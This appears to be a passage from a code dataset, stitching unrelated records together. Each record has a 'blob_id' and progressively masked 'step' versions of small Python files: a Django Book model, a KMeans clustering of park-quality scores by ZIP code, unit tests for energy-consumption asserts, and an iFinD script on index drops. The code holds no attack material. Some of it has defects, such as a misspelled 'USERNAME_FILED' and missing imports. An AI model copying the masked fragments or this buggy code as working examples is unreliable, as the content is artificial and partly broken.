# firstname = models.CharField(max_length=255)
# lastname = models.CharField(max_length=255)
# is_active = models.BooleanField(default=True)
# is_staff = models.BooleanField(default=True)
#
# objects = UserAccountManager()
#
# USERNAME_FILED = 'email'
# REQUIRED_FIELDS = ['firstname','lastname','phonenumber']
#
# def get_full_name(self):
# return self.firstname + " " + self.lastname
#
# def get_short_name(self):
# return self.firstname
#
# def __str__(self):
# return self.email
|
normal
|
{
"blob_id": "8286407987301ace7af97d6acdcf6299ce3d8525",
"index": 5440,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Book(models.Model):\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Book(models.Model):\n title = models.TextField(max_length=32, blank=False, null=False)\n",
"step-4": "from django.db import models\n\n\nclass Book(models.Model):\n title = models.TextField(max_length=32, blank=False, null=False)\n",
"step-5": "from django.db import models\n\n\nclass Book(models.Model):\n title = models.TextField(max_length=32, blank=False, null=False)\n\n# from django.contrib.auth.models import AbstractBaseUser, PermissionsMixin, BaseUserManager\n#\n#\n# class UserAccountManager(BaseUserManager):\n# def create_user(self, email, firstname,lastname, phonenumber, password=None,):\n#\n# if not email:\n# raise ValueError('Users must have an email address')\n# email = self.normalize_email(email)\n# user = self.model(email=email, name=firstname)\n# user.set_password(password)\n# user.save()\n#\n# class UserAccount(AbstractBaseUser, PermissionsMixin):\n# email = models.EmailField(max_length=255, unique=True)\n# firstname = models.CharField(max_length=255)\n# lastname = models.CharField(max_length=255)\n# is_active = models.BooleanField(default=True)\n# is_staff = models.BooleanField(default=True)\n#\n# objects = UserAccountManager()\n#\n# USERNAME_FILED = 'email'\n# REQUIRED_FIELDS = ['firstname','lastname','phonenumber']\n#\n# def get_full_name(self):\n# return self.firstname + \" \" + self.lastname\n#\n# def get_short_name(self):\n# return self.firstname\n#\n# def __str__(self):\n# return self.email\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import numpy as np
import pandas as pd
import geopandas as gp
from sklearn.cluster import KMeans
import shapely
from descartes import PolygonPatch
# -- load the data
data = pd.read_csv('/scratch/share/gdobler/parqa/output/Tables/'
'ParkQualityScores/QualityArea_ZipCode_FiscalYears.csv')
zips = gp.GeoDataFrame.from_file('/scratch/share/gdobler/parqa/output/'
'ShapeData/ZIPCODE_Modified_Final.shp')
# -- prepare the data
cols = ['F2{0:03}'.format(i) for i in range(4,16)]
vals = data[cols].values
vals -=vals[:,np.newaxis].mean(-1)
vals /=vals[:,np.newaxis].std(-1)
# -- cluster
km = KMeans(n_clusters=5)
km.fit(vals)
# -- assign clusters to zips
zips['cluster'] = np.zeros(len(zips),dtype=int)-1
dzips = [i for i in data.ZIPCODE]
for ii in range(len(zips)):
tzip = int(zips.ZIPCODE[ii])
if tzip in dzips:
zips['cluster'][ii] = km.labels_[dzips.index(tzip)]
# -- assign color
zips['color'] = np.zeros(len(zips),dtype=str)
for tcluster in range(km.n_clusters):
print("tcluster = " + str(tcluster))
zips['color'][zips['cluster']==tcluster] = 'red'
zips['color'][zips['cluster']!=tcluster] = 'none'
# -- plot
close('all')
yrs = range(2004,2016)
fig, ax = plt.subplots(1,2,figsize=[10,5])
fig.set_facecolor('white')
ax[1].set_xlim([-74.26,-74.26+0.6])
ax[1].set_ylim([40.4,40.4+0.6])
ax[1].axis('off')
for ii in range(len(zips)):
geo = zips['geometry'][ii]
tzip = zips.ZIPCODE[ii]
if type(geo)==shapely.geometry.polygon.Polygon:
ax[1].add_patch(PolygonPatch(geo,fc=zips['color'][ii],
linewidth=0.2))
ax[0].plot(yrs,vals[km.labels_==tcluster].T,color='k',lw=0.1)
ax[0].plot(yrs,km.cluster_centers_[tcluster],color='indianred')
ax[0].set_title('Cluster {0}'.format(tcluster))
fig.canvas.draw()
fig.savefig('../Outputs/cluster_{0}_{1}.png'.format(tcluster,
km.n_clusters),
clobber=True)
|
normal
|
{
"blob_id": "2c181a33c84ce262404c192abdc515924a1916a9",
"index": 6165,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nvals -= vals[:, np.newaxis].mean(-1)\nvals /= vals[:, np.newaxis].std(-1)\n<mask token>\nkm.fit(vals)\n<mask token>\nfor ii in range(len(zips)):\n tzip = int(zips.ZIPCODE[ii])\n if tzip in dzips:\n zips['cluster'][ii] = km.labels_[dzips.index(tzip)]\n<mask token>\nfor tcluster in range(km.n_clusters):\n print('tcluster = ' + str(tcluster))\n zips['color'][zips['cluster'] == tcluster] = 'red'\n zips['color'][zips['cluster'] != tcluster] = 'none'\n close('all')\n yrs = range(2004, 2016)\n fig, ax = plt.subplots(1, 2, figsize=[10, 5])\n fig.set_facecolor('white')\n ax[1].set_xlim([-74.26, -74.26 + 0.6])\n ax[1].set_ylim([40.4, 40.4 + 0.6])\n ax[1].axis('off')\n for ii in range(len(zips)):\n geo = zips['geometry'][ii]\n tzip = zips.ZIPCODE[ii]\n if type(geo) == shapely.geometry.polygon.Polygon:\n ax[1].add_patch(PolygonPatch(geo, fc=zips['color'][ii],\n linewidth=0.2))\n ax[0].plot(yrs, vals[km.labels_ == tcluster].T, color='k', lw=0.1)\n ax[0].plot(yrs, km.cluster_centers_[tcluster], color='indianred')\n ax[0].set_title('Cluster {0}'.format(tcluster))\n fig.canvas.draw()\n fig.savefig('../Outputs/cluster_{0}_{1}.png'.format(tcluster, km.\n n_clusters), clobber=True)\n",
"step-3": "<mask token>\ndata = pd.read_csv(\n '/scratch/share/gdobler/parqa/output/Tables/ParkQualityScores/QualityArea_ZipCode_FiscalYears.csv'\n )\nzips = gp.GeoDataFrame.from_file(\n '/scratch/share/gdobler/parqa/output/ShapeData/ZIPCODE_Modified_Final.shp')\ncols = ['F2{0:03}'.format(i) for i in range(4, 16)]\nvals = data[cols].values\nvals -= vals[:, np.newaxis].mean(-1)\nvals /= vals[:, np.newaxis].std(-1)\nkm = KMeans(n_clusters=5)\nkm.fit(vals)\nzips['cluster'] = np.zeros(len(zips), dtype=int) - 1\ndzips = [i for i in data.ZIPCODE]\nfor ii in range(len(zips)):\n tzip = int(zips.ZIPCODE[ii])\n if tzip in dzips:\n zips['cluster'][ii] = km.labels_[dzips.index(tzip)]\nzips['color'] = np.zeros(len(zips), dtype=str)\nfor tcluster in range(km.n_clusters):\n print('tcluster = ' + str(tcluster))\n zips['color'][zips['cluster'] == tcluster] = 'red'\n zips['color'][zips['cluster'] != tcluster] = 'none'\n close('all')\n yrs = range(2004, 2016)\n fig, ax = plt.subplots(1, 2, figsize=[10, 5])\n fig.set_facecolor('white')\n ax[1].set_xlim([-74.26, -74.26 + 0.6])\n ax[1].set_ylim([40.4, 40.4 + 0.6])\n ax[1].axis('off')\n for ii in range(len(zips)):\n geo = zips['geometry'][ii]\n tzip = zips.ZIPCODE[ii]\n if type(geo) == shapely.geometry.polygon.Polygon:\n ax[1].add_patch(PolygonPatch(geo, fc=zips['color'][ii],\n linewidth=0.2))\n ax[0].plot(yrs, vals[km.labels_ == tcluster].T, color='k', lw=0.1)\n ax[0].plot(yrs, km.cluster_centers_[tcluster], color='indianred')\n ax[0].set_title('Cluster {0}'.format(tcluster))\n fig.canvas.draw()\n fig.savefig('../Outputs/cluster_{0}_{1}.png'.format(tcluster, km.\n n_clusters), clobber=True)\n",
"step-4": "import numpy as np\nimport pandas as pd\nimport geopandas as gp\nfrom sklearn.cluster import KMeans\nimport shapely\nfrom descartes import PolygonPatch\ndata = pd.read_csv(\n '/scratch/share/gdobler/parqa/output/Tables/ParkQualityScores/QualityArea_ZipCode_FiscalYears.csv'\n )\nzips = gp.GeoDataFrame.from_file(\n '/scratch/share/gdobler/parqa/output/ShapeData/ZIPCODE_Modified_Final.shp')\ncols = ['F2{0:03}'.format(i) for i in range(4, 16)]\nvals = data[cols].values\nvals -= vals[:, np.newaxis].mean(-1)\nvals /= vals[:, np.newaxis].std(-1)\nkm = KMeans(n_clusters=5)\nkm.fit(vals)\nzips['cluster'] = np.zeros(len(zips), dtype=int) - 1\ndzips = [i for i in data.ZIPCODE]\nfor ii in range(len(zips)):\n tzip = int(zips.ZIPCODE[ii])\n if tzip in dzips:\n zips['cluster'][ii] = km.labels_[dzips.index(tzip)]\nzips['color'] = np.zeros(len(zips), dtype=str)\nfor tcluster in range(km.n_clusters):\n print('tcluster = ' + str(tcluster))\n zips['color'][zips['cluster'] == tcluster] = 'red'\n zips['color'][zips['cluster'] != tcluster] = 'none'\n close('all')\n yrs = range(2004, 2016)\n fig, ax = plt.subplots(1, 2, figsize=[10, 5])\n fig.set_facecolor('white')\n ax[1].set_xlim([-74.26, -74.26 + 0.6])\n ax[1].set_ylim([40.4, 40.4 + 0.6])\n ax[1].axis('off')\n for ii in range(len(zips)):\n geo = zips['geometry'][ii]\n tzip = zips.ZIPCODE[ii]\n if type(geo) == shapely.geometry.polygon.Polygon:\n ax[1].add_patch(PolygonPatch(geo, fc=zips['color'][ii],\n linewidth=0.2))\n ax[0].plot(yrs, vals[km.labels_ == tcluster].T, color='k', lw=0.1)\n ax[0].plot(yrs, km.cluster_centers_[tcluster], color='indianred')\n ax[0].set_title('Cluster {0}'.format(tcluster))\n fig.canvas.draw()\n fig.savefig('../Outputs/cluster_{0}_{1}.png'.format(tcluster, km.\n n_clusters), clobber=True)\n",
"step-5": "import numpy as np\nimport pandas as pd\nimport geopandas as gp\nfrom sklearn.cluster import KMeans\nimport shapely\nfrom descartes import PolygonPatch\n\n\n# -- load the data\ndata = pd.read_csv('/scratch/share/gdobler/parqa/output/Tables/'\n 'ParkQualityScores/QualityArea_ZipCode_FiscalYears.csv')\n\nzips = gp.GeoDataFrame.from_file('/scratch/share/gdobler/parqa/output/'\n 'ShapeData/ZIPCODE_Modified_Final.shp')\n\n# -- prepare the data\ncols = ['F2{0:03}'.format(i) for i in range(4,16)]\nvals = data[cols].values\nvals -=vals[:,np.newaxis].mean(-1)\nvals /=vals[:,np.newaxis].std(-1)\n\n# -- cluster\nkm = KMeans(n_clusters=5)\nkm.fit(vals)\n\n# -- assign clusters to zips\nzips['cluster'] = np.zeros(len(zips),dtype=int)-1\ndzips = [i for i in data.ZIPCODE]\n\nfor ii in range(len(zips)):\n tzip = int(zips.ZIPCODE[ii])\n if tzip in dzips:\n zips['cluster'][ii] = km.labels_[dzips.index(tzip)]\n\n\n# -- assign color\nzips['color'] = np.zeros(len(zips),dtype=str)\nfor tcluster in range(km.n_clusters):\n print(\"tcluster = \" + str(tcluster))\n zips['color'][zips['cluster']==tcluster] = 'red'\n zips['color'][zips['cluster']!=tcluster] = 'none'\n\n # -- plot\n close('all')\n yrs = range(2004,2016)\n fig, ax = plt.subplots(1,2,figsize=[10,5])\n fig.set_facecolor('white')\n ax[1].set_xlim([-74.26,-74.26+0.6])\n ax[1].set_ylim([40.4,40.4+0.6])\n ax[1].axis('off')\n for ii in range(len(zips)):\n geo = zips['geometry'][ii]\n tzip = zips.ZIPCODE[ii]\n if type(geo)==shapely.geometry.polygon.Polygon:\n ax[1].add_patch(PolygonPatch(geo,fc=zips['color'][ii],\n linewidth=0.2))\n\n ax[0].plot(yrs,vals[km.labels_==tcluster].T,color='k',lw=0.1)\n ax[0].plot(yrs,km.cluster_centers_[tcluster],color='indianred')\n ax[0].set_title('Cluster {0}'.format(tcluster))\n fig.canvas.draw()\n fig.savefig('../Outputs/cluster_{0}_{1}.png'.format(tcluster,\n km.n_clusters),\n clobber=True)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class TestAssert(unittest.TestCase):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def test_consumption_below(self):
sample = create_random_sample(10, 1)
asserts.consumption_below(sample, 11)
with self.assertRaises(Exception):
asserts.consumption_below(sample, 9)
def test_consumption_lower_than_app(self):
sample_low_energy = create_random_sample(9, 1, app_pkg='com.sample',
use_case='login')
sample_high_energy = create_random_sample(12, 1, app_pkg=
'com.sample', use_case='login')
existing_sample_one = create_random_sample(10, 1, app_pkg=
'com.persisted', use_case='login')
existing_sample_two = create_random_sample(11, 1, app_pkg=
'com.persisted', use_case='logout')
for measurement in (existing_sample_one + existing_sample_two):
measurement.persist()
asserts.consumption_lower_than_app(sample_low_energy, 'com.persisted')
asserts.consumption_lower_than_app(sample_low_energy,
'com.persisted', 'login')
with self.assertRaises(Exception):
asserts.consumption_lower_than_app(sample_high_energy,
'com.persisted')
with self.assertRaises(Exception):
asserts.consumption_lower_than_app(sample_high_energy,
'com.persisted', 'login')
def test_top_percentile(self):
sample = create_random_sample(11, 1, app_pkg='com.sample', use_case
='login')
for i in range(100):
existing_sample = create_random_sample(i, 1, app_pkg=
'com.persisted.{}'.format(i), use_case='login')
for measurement in existing_sample:
measurement.persist()
asserts.top_percentile(sample, 12)
with self.assertRaises(Exception):
asserts.top_percentile(sample, 11)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestAssert(unittest.TestCase):
<|reserved_special_token_0|>
def setUp(self):
Measurement.csv_storage = self.TEST_CSV_STORAGE
self.addCleanup(Measurement.clear_database)
def test_consumption_below(self):
sample = create_random_sample(10, 1)
asserts.consumption_below(sample, 11)
with self.assertRaises(Exception):
asserts.consumption_below(sample, 9)
def test_consumption_lower_than_app(self):
sample_low_energy = create_random_sample(9, 1, app_pkg='com.sample',
use_case='login')
sample_high_energy = create_random_sample(12, 1, app_pkg=
'com.sample', use_case='login')
existing_sample_one = create_random_sample(10, 1, app_pkg=
'com.persisted', use_case='login')
existing_sample_two = create_random_sample(11, 1, app_pkg=
'com.persisted', use_case='logout')
for measurement in (existing_sample_one + existing_sample_two):
measurement.persist()
asserts.consumption_lower_than_app(sample_low_energy, 'com.persisted')
asserts.consumption_lower_than_app(sample_low_energy,
'com.persisted', 'login')
with self.assertRaises(Exception):
asserts.consumption_lower_than_app(sample_high_energy,
'com.persisted')
with self.assertRaises(Exception):
asserts.consumption_lower_than_app(sample_high_energy,
'com.persisted', 'login')
def test_top_percentile(self):
sample = create_random_sample(11, 1, app_pkg='com.sample', use_case
='login')
for i in range(100):
existing_sample = create_random_sample(i, 1, app_pkg=
'com.persisted.{}'.format(i), use_case='login')
for measurement in existing_sample:
measurement.persist()
asserts.top_percentile(sample, 12)
with self.assertRaises(Exception):
asserts.top_percentile(sample, 11)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestAssert(unittest.TestCase):
TEST_CSV_STORAGE = './test_asserts_db.csv'
def setUp(self):
Measurement.csv_storage = self.TEST_CSV_STORAGE
self.addCleanup(Measurement.clear_database)
def test_consumption_below(self):
sample = create_random_sample(10, 1)
asserts.consumption_below(sample, 11)
with self.assertRaises(Exception):
asserts.consumption_below(sample, 9)
def test_consumption_lower_than_app(self):
sample_low_energy = create_random_sample(9, 1, app_pkg='com.sample',
use_case='login')
sample_high_energy = create_random_sample(12, 1, app_pkg=
'com.sample', use_case='login')
existing_sample_one = create_random_sample(10, 1, app_pkg=
'com.persisted', use_case='login')
existing_sample_two = create_random_sample(11, 1, app_pkg=
'com.persisted', use_case='logout')
for measurement in (existing_sample_one + existing_sample_two):
measurement.persist()
asserts.consumption_lower_than_app(sample_low_energy, 'com.persisted')
asserts.consumption_lower_than_app(sample_low_energy,
'com.persisted', 'login')
with self.assertRaises(Exception):
asserts.consumption_lower_than_app(sample_high_energy,
'com.persisted')
with self.assertRaises(Exception):
asserts.consumption_lower_than_app(sample_high_energy,
'com.persisted', 'login')
def test_top_percentile(self):
sample = create_random_sample(11, 1, app_pkg='com.sample', use_case
='login')
for i in range(100):
existing_sample = create_random_sample(i, 1, app_pkg=
'com.persisted.{}'.format(i), use_case='login')
for measurement in existing_sample:
measurement.persist()
asserts.top_percentile(sample, 12)
with self.assertRaises(Exception):
asserts.top_percentile(sample, 11)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import unittest
from physalia import asserts
from physalia.fixtures.models import create_random_sample
from physalia.models import Measurement
class TestAssert(unittest.TestCase):
TEST_CSV_STORAGE = './test_asserts_db.csv'
def setUp(self):
Measurement.csv_storage = self.TEST_CSV_STORAGE
self.addCleanup(Measurement.clear_database)
def test_consumption_below(self):
sample = create_random_sample(10, 1)
asserts.consumption_below(sample, 11)
with self.assertRaises(Exception):
asserts.consumption_below(sample, 9)
def test_consumption_lower_than_app(self):
sample_low_energy = create_random_sample(9, 1, app_pkg='com.sample',
use_case='login')
sample_high_energy = create_random_sample(12, 1, app_pkg=
'com.sample', use_case='login')
existing_sample_one = create_random_sample(10, 1, app_pkg=
'com.persisted', use_case='login')
existing_sample_two = create_random_sample(11, 1, app_pkg=
'com.persisted', use_case='logout')
for measurement in (existing_sample_one + existing_sample_two):
measurement.persist()
asserts.consumption_lower_than_app(sample_low_energy, 'com.persisted')
asserts.consumption_lower_than_app(sample_low_energy,
'com.persisted', 'login')
with self.assertRaises(Exception):
asserts.consumption_lower_than_app(sample_high_energy,
'com.persisted')
with self.assertRaises(Exception):
asserts.consumption_lower_than_app(sample_high_energy,
'com.persisted', 'login')
def test_top_percentile(self):
sample = create_random_sample(11, 1, app_pkg='com.sample', use_case
='login')
for i in range(100):
existing_sample = create_random_sample(i, 1, app_pkg=
'com.persisted.{}'.format(i), use_case='login')
for measurement in existing_sample:
measurement.persist()
asserts.top_percentile(sample, 12)
with self.assertRaises(Exception):
asserts.top_percentile(sample, 11)
<|reserved_special_token_1|>
"""Test Assert module."""
import unittest
from physalia import asserts
from physalia.fixtures.models import create_random_sample
from physalia.models import Measurement
# pylint: disable=missing-docstring
class TestAssert(unittest.TestCase):
TEST_CSV_STORAGE = "./test_asserts_db.csv"
def setUp(self):
Measurement.csv_storage = self.TEST_CSV_STORAGE
self.addCleanup(Measurement.clear_database)
def test_consumption_below(self):
sample = create_random_sample(10, 1)
asserts.consumption_below(sample, 11)
with self.assertRaises(Exception):
asserts.consumption_below(sample, 9)
def test_consumption_lower_than_app(self):
sample_low_energy = create_random_sample(
9, 1,
app_pkg='com.sample',
use_case='login'
)
sample_high_energy = create_random_sample(
12, 1,
app_pkg='com.sample',
use_case='login'
)
existing_sample_one = create_random_sample(
10, 1,
app_pkg='com.persisted',
use_case='login'
)
existing_sample_two = create_random_sample(
11, 1,
app_pkg='com.persisted',
use_case='logout'
)
for measurement in existing_sample_one+existing_sample_two:
measurement.persist()
asserts.consumption_lower_than_app(
sample_low_energy, "com.persisted"
)
asserts.consumption_lower_than_app(
sample_low_energy, "com.persisted", "login"
)
with self.assertRaises(Exception):
asserts.consumption_lower_than_app(
sample_high_energy, "com.persisted"
)
with self.assertRaises(Exception):
asserts.consumption_lower_than_app(
sample_high_energy, "com.persisted", "login"
)
def test_top_percentile(self):
sample = create_random_sample(
11, 1,
app_pkg='com.sample',
use_case='login'
)
for i in range(100):
existing_sample = create_random_sample(
i, 1,
app_pkg=('com.persisted.{}'.format(i)),
use_case='login'
)
for measurement in existing_sample:
measurement.persist()
asserts.top_percentile(sample, 12)
with self.assertRaises(Exception):
asserts.top_percentile(sample, 11)
|
flexible
|
{
"blob_id": "eda1c1db5371f5171f0e1929e98d09e10fdcef24",
"index": 1677,
"step-1": "<mask token>\n\n\nclass TestAssert(unittest.TestCase):\n <mask token>\n <mask token>\n\n def test_consumption_below(self):\n sample = create_random_sample(10, 1)\n asserts.consumption_below(sample, 11)\n with self.assertRaises(Exception):\n asserts.consumption_below(sample, 9)\n\n def test_consumption_lower_than_app(self):\n sample_low_energy = create_random_sample(9, 1, app_pkg='com.sample',\n use_case='login')\n sample_high_energy = create_random_sample(12, 1, app_pkg=\n 'com.sample', use_case='login')\n existing_sample_one = create_random_sample(10, 1, app_pkg=\n 'com.persisted', use_case='login')\n existing_sample_two = create_random_sample(11, 1, app_pkg=\n 'com.persisted', use_case='logout')\n for measurement in (existing_sample_one + existing_sample_two):\n measurement.persist()\n asserts.consumption_lower_than_app(sample_low_energy, 'com.persisted')\n asserts.consumption_lower_than_app(sample_low_energy,\n 'com.persisted', 'login')\n with self.assertRaises(Exception):\n asserts.consumption_lower_than_app(sample_high_energy,\n 'com.persisted')\n with self.assertRaises(Exception):\n asserts.consumption_lower_than_app(sample_high_energy,\n 'com.persisted', 'login')\n\n def test_top_percentile(self):\n sample = create_random_sample(11, 1, app_pkg='com.sample', use_case\n ='login')\n for i in range(100):\n existing_sample = create_random_sample(i, 1, app_pkg=\n 'com.persisted.{}'.format(i), use_case='login')\n for measurement in existing_sample:\n measurement.persist()\n asserts.top_percentile(sample, 12)\n with self.assertRaises(Exception):\n asserts.top_percentile(sample, 11)\n",
"step-2": "<mask token>\n\n\nclass TestAssert(unittest.TestCase):\n <mask token>\n\n def setUp(self):\n Measurement.csv_storage = self.TEST_CSV_STORAGE\n self.addCleanup(Measurement.clear_database)\n\n def test_consumption_below(self):\n sample = create_random_sample(10, 1)\n asserts.consumption_below(sample, 11)\n with self.assertRaises(Exception):\n asserts.consumption_below(sample, 9)\n\n def test_consumption_lower_than_app(self):\n sample_low_energy = create_random_sample(9, 1, app_pkg='com.sample',\n use_case='login')\n sample_high_energy = create_random_sample(12, 1, app_pkg=\n 'com.sample', use_case='login')\n existing_sample_one = create_random_sample(10, 1, app_pkg=\n 'com.persisted', use_case='login')\n existing_sample_two = create_random_sample(11, 1, app_pkg=\n 'com.persisted', use_case='logout')\n for measurement in (existing_sample_one + existing_sample_two):\n measurement.persist()\n asserts.consumption_lower_than_app(sample_low_energy, 'com.persisted')\n asserts.consumption_lower_than_app(sample_low_energy,\n 'com.persisted', 'login')\n with self.assertRaises(Exception):\n asserts.consumption_lower_than_app(sample_high_energy,\n 'com.persisted')\n with self.assertRaises(Exception):\n asserts.consumption_lower_than_app(sample_high_energy,\n 'com.persisted', 'login')\n\n def test_top_percentile(self):\n sample = create_random_sample(11, 1, app_pkg='com.sample', use_case\n ='login')\n for i in range(100):\n existing_sample = create_random_sample(i, 1, app_pkg=\n 'com.persisted.{}'.format(i), use_case='login')\n for measurement in existing_sample:\n measurement.persist()\n asserts.top_percentile(sample, 12)\n with self.assertRaises(Exception):\n asserts.top_percentile(sample, 11)\n",
"step-3": "<mask token>\n\n\nclass TestAssert(unittest.TestCase):\n TEST_CSV_STORAGE = './test_asserts_db.csv'\n\n def setUp(self):\n Measurement.csv_storage = self.TEST_CSV_STORAGE\n self.addCleanup(Measurement.clear_database)\n\n def test_consumption_below(self):\n sample = create_random_sample(10, 1)\n asserts.consumption_below(sample, 11)\n with self.assertRaises(Exception):\n asserts.consumption_below(sample, 9)\n\n def test_consumption_lower_than_app(self):\n sample_low_energy = create_random_sample(9, 1, app_pkg='com.sample',\n use_case='login')\n sample_high_energy = create_random_sample(12, 1, app_pkg=\n 'com.sample', use_case='login')\n existing_sample_one = create_random_sample(10, 1, app_pkg=\n 'com.persisted', use_case='login')\n existing_sample_two = create_random_sample(11, 1, app_pkg=\n 'com.persisted', use_case='logout')\n for measurement in (existing_sample_one + existing_sample_two):\n measurement.persist()\n asserts.consumption_lower_than_app(sample_low_energy, 'com.persisted')\n asserts.consumption_lower_than_app(sample_low_energy,\n 'com.persisted', 'login')\n with self.assertRaises(Exception):\n asserts.consumption_lower_than_app(sample_high_energy,\n 'com.persisted')\n with self.assertRaises(Exception):\n asserts.consumption_lower_than_app(sample_high_energy,\n 'com.persisted', 'login')\n\n def test_top_percentile(self):\n sample = create_random_sample(11, 1, app_pkg='com.sample', use_case\n ='login')\n for i in range(100):\n existing_sample = create_random_sample(i, 1, app_pkg=\n 'com.persisted.{}'.format(i), use_case='login')\n for measurement in existing_sample:\n measurement.persist()\n asserts.top_percentile(sample, 12)\n with self.assertRaises(Exception):\n asserts.top_percentile(sample, 11)\n",
"step-4": "<mask token>\nimport unittest\nfrom physalia import asserts\nfrom physalia.fixtures.models import create_random_sample\nfrom physalia.models import Measurement\n\n\nclass TestAssert(unittest.TestCase):\n TEST_CSV_STORAGE = './test_asserts_db.csv'\n\n def setUp(self):\n Measurement.csv_storage = self.TEST_CSV_STORAGE\n self.addCleanup(Measurement.clear_database)\n\n def test_consumption_below(self):\n sample = create_random_sample(10, 1)\n asserts.consumption_below(sample, 11)\n with self.assertRaises(Exception):\n asserts.consumption_below(sample, 9)\n\n def test_consumption_lower_than_app(self):\n sample_low_energy = create_random_sample(9, 1, app_pkg='com.sample',\n use_case='login')\n sample_high_energy = create_random_sample(12, 1, app_pkg=\n 'com.sample', use_case='login')\n existing_sample_one = create_random_sample(10, 1, app_pkg=\n 'com.persisted', use_case='login')\n existing_sample_two = create_random_sample(11, 1, app_pkg=\n 'com.persisted', use_case='logout')\n for measurement in (existing_sample_one + existing_sample_two):\n measurement.persist()\n asserts.consumption_lower_than_app(sample_low_energy, 'com.persisted')\n asserts.consumption_lower_than_app(sample_low_energy,\n 'com.persisted', 'login')\n with self.assertRaises(Exception):\n asserts.consumption_lower_than_app(sample_high_energy,\n 'com.persisted')\n with self.assertRaises(Exception):\n asserts.consumption_lower_than_app(sample_high_energy,\n 'com.persisted', 'login')\n\n def test_top_percentile(self):\n sample = create_random_sample(11, 1, app_pkg='com.sample', use_case\n ='login')\n for i in range(100):\n existing_sample = create_random_sample(i, 1, app_pkg=\n 'com.persisted.{}'.format(i), use_case='login')\n for measurement in existing_sample:\n measurement.persist()\n asserts.top_percentile(sample, 12)\n with self.assertRaises(Exception):\n asserts.top_percentile(sample, 11)\n",
"step-5": "\"\"\"Test Assert module.\"\"\"\n\nimport unittest\nfrom physalia import asserts\nfrom physalia.fixtures.models import create_random_sample\nfrom physalia.models import Measurement\n\n# pylint: disable=missing-docstring\n\nclass TestAssert(unittest.TestCase):\n TEST_CSV_STORAGE = \"./test_asserts_db.csv\"\n\n def setUp(self):\n Measurement.csv_storage = self.TEST_CSV_STORAGE\n self.addCleanup(Measurement.clear_database)\n\n def test_consumption_below(self):\n sample = create_random_sample(10, 1)\n asserts.consumption_below(sample, 11)\n with self.assertRaises(Exception):\n asserts.consumption_below(sample, 9)\n\n def test_consumption_lower_than_app(self):\n sample_low_energy = create_random_sample(\n 9, 1,\n app_pkg='com.sample',\n use_case='login'\n )\n sample_high_energy = create_random_sample(\n 12, 1,\n app_pkg='com.sample',\n use_case='login'\n )\n existing_sample_one = create_random_sample(\n 10, 1,\n app_pkg='com.persisted',\n use_case='login'\n )\n existing_sample_two = create_random_sample(\n 11, 1,\n app_pkg='com.persisted',\n use_case='logout'\n )\n\n for measurement in existing_sample_one+existing_sample_two:\n measurement.persist()\n\n asserts.consumption_lower_than_app(\n sample_low_energy, \"com.persisted\"\n )\n asserts.consumption_lower_than_app(\n sample_low_energy, \"com.persisted\", \"login\"\n )\n with self.assertRaises(Exception):\n asserts.consumption_lower_than_app(\n sample_high_energy, \"com.persisted\"\n )\n with self.assertRaises(Exception):\n asserts.consumption_lower_than_app(\n sample_high_energy, \"com.persisted\", \"login\"\n )\n\n def test_top_percentile(self):\n sample = create_random_sample(\n 11, 1,\n app_pkg='com.sample',\n use_case='login'\n )\n for i in range(100):\n existing_sample = create_random_sample(\n i, 1,\n app_pkg=('com.persisted.{}'.format(i)),\n use_case='login'\n )\n for measurement in existing_sample:\n measurement.persist()\n asserts.top_percentile(sample, 12)\n with self.assertRaises(Exception):\n 
asserts.top_percentile(sample, 11)\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
import pandas as pd
from datetime import datetime
from iFinDPy import *
thsLogin = THS_iFinDLogin("iFind账号","iFind账号密码")
index_list = ['000001.SH','399001.SZ','399006.SZ']
result = pd.DataFrame()
today =datetime.today().strftime('%Y-%m-%d')
for index in index_list:
data_js = THS_DateSerial(index,'ths_pre_close_index;ths_open_price_index;ths_close_price_index;ths_high_price_index',';;;',\
'Days:Tradedays,Fill:Previous,Interval:D,block:history','2000-01-01',today,True)
data_df = THS_Trans2DataFrame(data_js)
data_df['close_chg'] = data_df['ths_close_price_index'] / data_df['ths_pre_close_index'] * 100 - 100
result_pd = data_df[(data_df['close_chg'] < -5)]
date_list = result_pd['time'].tolist()
print('{}收盘在-5%的交易日有{}'.format(index,str(date_list)))
for date in date_list:
date_after_1month = THS_DateOffset('SSE','dateType:1,period:D,offset:30,dateFormat:0,output:singledate',date)['tables']['time'][0]
date_after_3month = THS_DateOffset('SSE','dateType:1,period:D,offset:90,dateFormat:0,output:singledate',date)['tables']['time'][0]
date_after_1year = THS_DateOffset('SSE','dateType:1,period:D,offset:365,dateFormat:0,output:singledate',date)['tables']['time'][0]
if date > (datetime.today() + timedelta(days=-365)).strftime('%Y-%m-%d'):
continue
index_close_date = THS_BasicData(index,'ths_close_price_index',date)['tables'][0]['table']['ths_close_price_index'][0]
index_close_date_after_1month = THS_BasicData(index,'ths_close_price_index',date_after_1month)['tables'][0]['table']['ths_close_price_index'][0]
index_close_date_after_3month = THS_BasicData(index,'ths_close_price_index',date_after_3month)['tables'][0]['table']['ths_close_price_index'][0]
index_close_date_after_1year = THS_BasicData(index,'ths_close_price_index',date_after_1year)['tables'][0]['table']['ths_close_price_index'][0]
result = result.append(pd.DataFrame([index,date,index_close_date,index_close_date_after_1month,index_close_date_after_3month,index_close_date_after_1year]).T)
result.columns = ['指数代码','大跌日','大跌日点数','一个月后点数','三个月后点数','一年后点数']
result = result.set_index('指数代码')
result['大跌一个月后涨跌幅'] = result['一个月后点数']/result['大跌日点数'] *100 -100
result['大跌三个月后涨跌幅'] = result['三个月后点数']/result['大跌日点数'] *100 -100
result['大跌一年后涨跌幅'] = result['一年后点数']/result['大跌日点数'] *100 -100
result
|
normal
|
{
"blob_id": "7f62af951b49c3d1796c2811527ceb30ca931632",
"index": 8607,
"step-1": "<mask token>\n",
